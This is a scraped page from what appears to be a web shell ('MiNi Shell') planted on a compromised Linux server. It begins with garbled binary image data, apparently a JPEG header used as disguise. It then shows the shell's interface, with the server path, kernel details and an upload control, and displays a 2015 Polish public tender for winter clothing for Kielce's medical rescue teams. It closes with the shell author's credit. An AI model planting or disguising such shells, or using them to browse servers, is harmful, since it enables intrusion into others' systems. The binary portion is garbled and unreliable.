JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150526/124766-N-2015.html

<p class="kh_header"><b>Kielce: Dostawa odzieży zimowej dla służb ratownictwa medycznego</b><br>
<b>Numer ogłoszenia: 124766 - 2015; data zamieszczenia: 26.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Ratownictwa Medycznego i Transportu Sanitarnego , ul. Św. Leonarda 10, 25-311 Kielce, woj. świętokrzyskie, tel. 041 3612344 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scrmits.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży zimowej dla służb ratownictwa medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odzieży ochronnej zimowej dla pracowników zespołów wyjazdowych Ratownictwa Medycznego w ilości 494 kompletów.

2.Oferowana odzież musi spełniać wymagania:
- odzież ochronna ostrzegawcza o intensywnej widzialności dla pracowników zespołów Ratownictwa Medycznego - kurtka całosezonowa z ocieplana podpinką typu polar, spodnie zimowe
- odzież musi posiadać znak CE zamieszczony na metce zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 21.12.2005 (sposób oznakowania środków ochrony indywidualnej)
- okres gwarancji 24 miesiące
- modele odzieży uszyte z rozróżnieniem sylwetek damskich i męskich
- każdy komplet  odzieży pakowany w worek foliowy z naniesionym nazwiskiem pracownika dla którego jest przeznaczony.
3. Opis szczegółowy
Każdy element odzieży zgodny z Rozporządzeniem Ministra Zdrowia z dnia 18.10.2010 w sprawie oznaczenia systemu Państwowe Ratownictwo Medyczne oraz wymagań w zakresie umundurowania członków zespołów ratownictwa medycznego.

Komplet odzieży składa się z:
- Kurtka całoroczna
- Bluza typu polar, umożliwiająca używanie jako podpinka do w/w kurtki
- Spodnie zimowe

Wymagane dokumenty:
- Karty techniczne tkaniny, membrany i dzianiny typu polar
- Karty technicznej i Certyfikatu zgodności z normą EN ISO 20471:2013 (PN-EN ISO 20471: 2013 -07) na taśmę odblaskową
- Certyfikat Oeko-Tex Standard 100 na tkaninę, membranę i dzianinę
- Certyfikat Oeko-Tex Standard 100 na nici, napy, guziki, taśmę rzepowi, zamki błyskawiczne oraz taśmę odblaskową

Kurtka:
- Materiał w kolorze fluorescencyjnym czerwonym , wstawki w kolorze granatowym mankiety, dolna krawędź kurtki od taśmy odblaskowej, wewnętrzna strona kołnierza, spodnia część od nadgarstka do wysokości łokcia oraz przednia i tylnia część karczka
- Tkania 100% PES o gramaturze 130-140 g/m2 
- Wykończona wysoką stójką , zapinana na zamek kostkowy dwustronnie rozdzielczy, schowane w plisie rzepy
- Wyposażona w zamek i mocowania umożliwiające wpięcie polarowej podpinki
- Kaptur doszyty i chowany w stójce z profilowanym daszkiem i regulacja obwodu
- Od wewnątrz wykończona membraną z podklejonymi wodoszczelną taśmą szwami
- Membrana 100% PES o gramaturze 80-90 g/m2
- Rękawy odpinane, łączone na zamki kostkowe schowane pod plisą
- Wzmocnienia na łokciach (naszyta dodatkowa warstwa materiału)
- Mankiety z regulacją obwodu zapinane na napy
- Regulowany obwód w pasie i dole kurtki
- Dwie dolne, wpuszczone wewnętrznie kieszenie kryte patkami, zapinane na skośnie umieszczone zamki
- Dwie górne, wpuszczone wewnętrznie kieszenie kryte patkami zapinanymi na napy, lewa na radiotelefon, z regulowana na rzep patką oraz mocowaniem anteny
- Jedna wewnętrzna sucha kieszeń
- Srebrna taśma odblaskowa o wytrzymałości minimum 100 cykli prania w warunkach domowych w temperaturze 60oC oraz minimum 50 cykli prania chemicznego - rozmieszczona zgodnie z wymogami RMZ z dnia 18.10.2010 r.
- Cztery naszyte emblematy odblaskowe, granatowo - srebrne: logo Państwowego Ratownictwa Medycznego i funkcji.

Na prawym rękawie kurtki naszyty emblemat o średnicy 10 cm z logo Świętokrzyskiego Centrum Ratownictwa Medycznego i Transportu Sanitarnego w Kielcach wg wzoru i w kolorze jak w załączniku nr 7 do SIWZ ( którego wykonanie i przyszycie należy uwzględnić w cenie kurtki), 
Na potwierdzenie zgodności oferowanego przedmiotu zamówienia z wymaganiami SIWZ i wymienionymi normami Zamawiający żąda Certyfikatu Oceny Typu WE wydanego przez jednostkę notyfikowaną w zakresie dyrektywy 89/686/EEC - na gotowy wyrób/model kurtki całosezonowej (CE kategoria II), potwierdzającego spełnianie wymagań:
a) Rozporządzenia Ministra Gospodarki z dnia 21.12.2005 w sprawie wymagań dla środków ochrony indywidualnej. (Dz. U. z 2005 r. Nr 259, poz. 2173)
b) EN ISO 13688:2013 (PN EN ISO 13688:2013 - 12) Odzież ochronna. Wymagania ogólne.
c) EN ISO 20471:2013 (PN-EN ISO 20471:2013-07). Odzież o intensywnej widzialności-
Metody badania i wymagania. Klasa -2.
d) EN 343:2003+A1:2007/AC:2009 (PN EN 343+A1:2008;PN EN 343+A1:2007/AC:2009)
Odzież ochronna. Ochrona przed deszczem. Klasa odporności na przenikanie wody i opór pary wodnej - 3
Bluza podpinka do kurtki:
- Dzianina typu polar w kolorze fluorescencyjnym czerwonym zgodnym z normą EN ISO 20471:2013 (PN-EN ISO 20471:2013 -07) z wstawkami granatowymi w przedniej części bluzy, wewnętrzna strona kołnierza, końcówki mankietów.
- Dzianina 100% PES o gramaturze 380-390 g/m2
- Zapinana na zamek kostkowy umożliwiający wpięcie do kurtki
- Dwie boczne, skośne wpuszczane kieszenie zapinane na kostkowe zamki
- Jedna wewnętrzna kieszeń zapinana na rzep
- Regulowany obwód w pasie
- Na rękawach wokół całego obwodu srebrna taśma odblaskowa o wytrzymałości minimum 60 cykli prania w warunkach domowych w temperaturze 60o C
- Na plecach w dolnej części bluzy srebrna taśma odblaskowa o wytrzymałości minimum 100 cykli prania w warunkach domowych w temperaturze 60o C oraz minimum 50 cykli prania chemicznego.
- Jeden naszyty na klatce piersiowej emblemat odblaskowy logo PRM.
Na prawym rękawie podpinki naszyty emblemat o średnicy 10 cm z logo Świętokrzyskiego Centrum Ratownictwa Medycznego i Transportu Sanitarnego w Kielcach wg wzoru i w kolorze jak w załączniku nr 7 do SIWZ ( którego wykonanie i przyszycie należy uwzględnić w cenie bluzy,


Na potwierdzenie zgodności oferowanego przedmiotu zamówienia z wymaganiami SIWZ i wymienionymi normami Zamawiający żąda Deklaracji Zgodności wydanej przez producenta - na gotowy wyrób/model bluzę podpinkę do kurtki (CE kategoria I), potwierdzającej spełnienie wymagań:
a) Rozporządzenia Ministra Gospodarki z dnia 21.12.2005 w sprawie wymagań dla środków ochrony indywidualnej. (Dz. U. z 2005 r. Nr 259, poz. 2173)
b) EN ISO 13688:2013 (PN EN ISO 13688 :2013 - 12) Odzież ochronna. Wymagania ogólne.
c) EN 14058:2004 (PN-EN 14058:2007) Odzież ochronna. Wyroby młodzieżowe chroniące przed chłodem; w 2 klasie oporu cieplnego.
Dodatkowo:
d) raporty z badań wykonanych w akredytowanych laboratoriach badawczych na materiały zastosowane w produkcji, potwierdzających spełnianie norm wymienionych w Rozporządzeniu Ministra Zdrowia z dnia 18.10.2010 r.:
- PN-EN 14058:2007 - w zakresie oporu cieplnego, co najmniej klasa 2 - metoda badań EN 31092 albo ISO 5085-1 , - EN ISO 13688:2013 (PN-EN ISO 13688:2013-12) Odzież ochronna. Wymagania ogólne. Potwierdzającego barwę fluorescencyjną czerwoną dzianiny.


Spodnie zimowe:
- Materiał w kolorze fluorescencyjnym czerwonym, wstawki w kolorze granatowym na kolanach, dolna część nogawek od taśmy odblaskowej, pas w całym obwodzie, wloty kieszeni biodrowych i na pośladkach.
- Tkanina  100% PES o gramaturze 130-140 g/m2
- Od wewnątrz wykończone membraną z podklejonymi wodoszczelną taśmą szwami
- Membrana 100% PES o gramaturze 80-90 g/m2
- Zapinane na guzik i metalowy zamek
- Wykończone pasem z gumową regulacją oraz wzmocnionymi szlufkami
- Dwie wpuszczone kieszenie biodrowe zapinane na kryte zamki
- Z tyłu jedna kieszeń wpuszczana z patką, zapinana na zamek
- Na nogawkach dwie kieszenie butelkowe, kryte patkami, zapinane na zamki
- Wzmocnione kolana oraz kostkowe zamki wszywane po zewnętrznej stronie dołu nogawek
- Srebrna taśma odblaskowa o wytrzymałości minimum 100 cykli prania w warunkach domowych w temperaturze 60oC oraz minimum 50 cykli prania chemicznego - rozmieszczona zgodnie z wymogami RMZ z dnia 18.10.2010 r.

Na potwierdzenie zgodności oferowanego przedmiotu zamówienia z wymaganiami SIWZ i wymienionymi normami Zamawiający żąda Certyfikatu Oceny Typu WE wydanego przez jednostkę notyfikowaną w zakresie dyrektywy 89/686/EEC - na gotowy wyrób/model spodni zimowych (CE kategoria II), potwierdzającego spełnianie wymagań opisanych poniżej:
a) Rozporządzenia Ministra Gospodarki z dnia 21.12.2005 w sprawie wymagań dla środków ochrony indywidualnej. (Dz. U. z 2005 r. Nr 259, poz. 2173)
b) EN ISO 13688:2013 (PN EN ISO 13688:2013 - 12) Odzież ochronna. Wymagania ogólne.
c) EN ISO 20471:2013 (PN-EN ISO 20471:2013-07). Odzież o intensywnej widzialności-
Metody badania i wymagania. Klasa -2.
d) EN 343:2003+A1:2007/AC:2009 (PN EN 343+A1:2008;PN EN 343+A1:2007/AC:2009)
Odzież ochronna. Ochrona przed deszczem. Klasa odporności na przenikanie wody i opór pary wodnej - 3.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium 5.000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art.22 ust.1 pkt 1-4 ustawy pzp,na zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 2  dostaw  odzieży ochronnej dla służb ratownictwa medycznego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, o wartości minimum 300 tys. zł brutto każda wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie( np. poświadczenie), wg wzoru - zał. nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art.22 ust.1 pkt 1-4 ustawy pzp,na zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art.22 ust.1 pkt 1-4 ustawy pzp,na zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art.22 ust.1 pkt 1-4 ustawy pzp,na zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające posiadanieuprawnień/pełnomocnictw osób składających ofertę,o ile nie wynika to z przedstawionych dokumentów rejestrowych,karty techniczne, certyfikaty,deklarację zgodności producenta na gotowy wyrób/model bluzy podpinki wg opisu w SIWZ</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Oceny użytkowej - 25</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.scrmits.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25-040 Kielce, ul. Pakosz 72, pokój 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 12:00, miejsce: 25-040 Kielce, ul. Pakosz 72, pokój 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com